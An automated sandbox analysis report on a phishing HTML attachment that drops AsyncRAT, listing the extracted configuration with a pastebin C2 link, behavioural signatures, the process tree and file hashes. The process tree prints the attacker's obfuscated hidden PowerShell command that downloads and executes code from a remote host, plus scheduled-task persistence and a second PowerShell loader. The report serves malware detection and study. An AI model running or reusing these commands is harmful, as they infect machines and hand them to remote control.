Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
12/07/2024, 14:00
Static task
static1
General
-
Target
Statment#5173642159.html
-
Size
1KB
-
MD5
1231d299fcd9917fde1326f9ef677361
-
SHA1
f92479f63b0279c16e8499fe294e7b3d81da5942
-
SHA256
e296925add362ceb26927e02439ad56accc8ce03b14712fbd4dd41377be036aa
-
SHA512
0b76638bad3c2036c048b4b381a6192a14ed8770545d73ad8d49990ce30bd725b75fa721578e47cad8b946f63cc2e3681014acf72ba4af3598adba9e49345205
Malware Config
Extracted
asyncrat
AWS | 3Losh
Elsa3eed
AsyncMutex_alosh
-
delay
3
-
install
false
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/C7vDhgZQ
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 76 3600 WScript.exe 80 1832 powershell.exe 86 1832 powershell.exe 90 1832 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1832 powershell.exe 4240 powershell.exe 4040 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: msedge.exe File opened (read-only) \??\E: WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 81 pastebin.com 82 pastebin.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 85 api.ipify.org 86 api.ipify.org -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4240 set thread context of 2876 4240 powershell.exe 128 PID 4040 set thread context of 5056 4040 powershell.exe 133 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 msedge.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\HardwareID msedge.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Service msedge.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 519947.crdownload:SmartScreen msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2872 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 2520 msedge.exe 2520 msedge.exe 3500 msedge.exe 3500 msedge.exe 4824 identity_helper.exe 4824 identity_helper.exe 5092 msedge.exe 5092 msedge.exe 1832 powershell.exe 1832 powershell.exe 1832 powershell.exe 4240 powershell.exe 4240 powershell.exe 4240 powershell.exe 2876 aspnet_compiler.exe 2876 aspnet_compiler.exe 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe 2820 msedge.exe 2820 msedge.exe 2820 msedge.exe 2820 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeManageVolumePrivilege 3500 msedge.exe Token: SeManageVolumePrivilege 3500 msedge.exe Token: SeDebugPrivilege 1832 powershell.exe Token: SeDebugPrivilege 4240 powershell.exe Token: SeDebugPrivilege 2876 aspnet_compiler.exe Token: SeDebugPrivilege 4040 powershell.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2876 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3500 wrote to memory of 4660 3500 msedge.exe 83 PID 3500 wrote to memory of 4660 3500 msedge.exe 83 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 2520 3500 msedge.exe 85 PID 3500 wrote to memory of 2520 3500 msedge.exe 85 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Statment#5173642159.html1⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab55746f8,0x7ffab5574708,0x7ffab55747182⤵PID:4660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:22⤵PID:3624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:82⤵PID:4916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:12⤵PID:212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:12⤵PID:672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4932 /prefetch:82⤵PID:4584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:12⤵PID:2444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:82⤵PID:4436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:12⤵PID:4704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:12⤵PID:2788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:12⤵PID:4864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:12⤵PID:1948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4860 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2820
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2212
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4376
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "E:\Statment#386350474.wsf"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Enumerates connected drives
PID:3600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://newwork.webredirect.org:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic23⤵
- Scheduled Task/Job: Scheduled Task
PID:2872
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Run /TN TvMusic23⤵PID:2360
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"1⤵
- Checks computer location settings
PID:4856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4240 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2876
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"1⤵
- Checks computer location settings
PID:1496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4040 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵PID:2256
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵PID:5056
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
152B
MD5210676dde5c0bd984dc057e2333e1075
SHA12d2f8c14ee48a2580f852db7ac605f81b5b1399a
SHA2562a89d71b4ddd34734b16d91ebd8ea68b760f321baccdd4963f91b8d3507a3fb5
SHA512aeb81804cac5b17a5d1e55327f62df7645e9bbbfa8cad1401e7382628341a939b7aedc749b2412c06174a9e3fcdd5248d6df9b5d3f56c53232d17e59277ab017
-
Filesize
152B
MD5f4e6521c03f1bc16d91d99c059cc5424
SHA1043665051c486192a6eefe6d0632cf34ae8e89ad
SHA2567759c346539367b2f80e78abca170f09731caa169e3462f11eda84c3f1ca63d1
SHA5120bb4f628da6d715910161439685052409be54435e192cb4105191472bb14a33724592df24686d1655e9ba9572bd3dff8f46e211c0310e16bfe2ac949c49fbc5e
-
Filesize
6KB
MD5b7c295462c702379bcd69d5ff104d688
SHA1306f2d407faf0c868283e2a9700e14b5a7674671
SHA256dddba0851a1ed97fabfc37bbbbf6a795119083acbb7e58de6c916b0c720cc34c
SHA512bb9cd713e8de351dc18a8e8d517d384f552f341d246c280d6c5fa7bb2fa6bb2f9ee1b8cd25db33eee11ee52170669b5543653f99e26caf153d1481b549cffa67
-
Filesize
6KB
MD5867b10a42e54129af21688c25ae0f299
SHA167ab8815a20530bca25cf1401196415b3705da03
SHA25617640dfa2e7d1b0ea491d686f2d420f4c90e2658ec2342d1bd7d07866b6f9593
SHA512f19c321e0e815ccb9da4e5e320a4e9b9498056473135b6eb52e70b736897794a2fff492362d28bd5b2c57e3f2267c0989981d26358cdaaff8d45f3097383b02b
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5dc09378287d1eae33d8f1ec412a3ced8
SHA1658568168c28af1e80d1f5f889bef16411d47a02
SHA2569e2f47c0d9ecc2c3a04361be490f817fcf3e99f3da8f440bcfddeb304c225364
SHA512b584b5a268ed49d1a871502b668883d353dab2b301c9b68e45b65516f2a696cf373f435a553708f03494257514ea90407fc27233de1943de43f8cdcd26aaaca1
-
Filesize
12KB
MD57640525a649803e7e666c0453ab2a35f
SHA18f4771d10d696fed6779329570c999a776e6bd44
SHA256aff9d97949406813b21c6ff5e28c68587e55900e1b9134314893d9e0e9034dce
SHA5121105045893f4dad094acb79194c563621a22f2601b3e3b6e8256be4e170d0d504febbe0632897590ecd87054ba9c8294c84a307ae3b3a364eadfc368405609f7
-
Filesize
1KB
MD58b56ab7631860454473cf924d0e1da02
SHA1cd3b8705f1008e1a2a19bd363ab0b291fd9ebd38
SHA2565624dd2edd0d950b56787cd937043d9c43ad667ac5471090e21cc0d2313eaa18
SHA512efe7cdf0dad52799a624c33878cacaca5bfeb08bc3fbb78cbdc768b92fa6c83e16b38dfd95a9fa4947d757b9ab276990fee02ae26abdea7b4fd32bf246c74f20
-
Filesize
1KB
MD5456bcc3f57826aa512563ed240ae114d
SHA19a139f1afdb517151cf977f75e0537e0365eb06d
SHA2564d339a35670859c11e9c3d6a930fd38402a8dbb468aad3c7d773a3190c3cdc36
SHA512a1366a65b6113c342186ab35befee0699fd4e83b66c79bee524d1248738ba9d874254c526d940e846823de13523171e49a0284aa6191327b078db545d3fe9e1f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.4MB
MD5556f847def0cd4a58a5c0b2bed7e167e
SHA135a79ffa7513c6bdd26582d1fa6efb3e00a49b16
SHA2560a8a474a0b9c28bc7454f8cdfc547cd85972b0df75f3d6bf9f98689f9b310778
SHA5122265fc3e51cc547f775fe35d8aaa4d7b102ccce15800a134530f20a869232c28a57ee1cfa21be0ecbd68dc27770312dfaba8e5aeca28913819b2e8abf5174bc5
-
Filesize
1KB
MD526913303151afee791eb652db6764fe2
SHA149418253140caeacb2a1b5bfac48f4bc8e8d5b24
SHA25614c815402dddbe953b9fd494e873d453251b3ec6ad996f5000174882040ba248
SHA5125e7b1045e34f0f39303dfecc0e601b8212b32acfa466642db1f4e9a0332fbdaffc5762aaf252385d974a1dd37f062e424a3fda5cad5317b1128dbd5b66f09141
-
Filesize
452KB
MD56c396a8cfe36cbdc7eb72c2f6c8b2346
SHA16078599b7406607c848e56e162ea79a691a2aff4
SHA2569f60cdba09c697e1277f56435afaa9a7922e62a53d87f44d2cf1eeef2eacbaf8
SHA5127a79bf3d19e5949df8ecba34339b922c73c3464747b8348e4908859f76c756e8a3c710873b84253ebedc846e83203f0ca72c46b9e6a06cb1a5dfd6ae32aced0b
-
Filesize
229B
MD566a1516e1d1e821084441211567d2e87
SHA10e688c9a93ad2cc162ef48ca75e0148e69d95ab1
SHA256d57293641ff05fea6af21fb73a4064eca49e5979f2395305bdea2a00a5de6717
SHA5121b77505b03a4a9c2c9437fbb94e828f34ed5b74187a258443af778b9450dc346e7027267e4ad6d33ff96c4036d936eba9dee05efbe136678bec6d0f7b68ecf12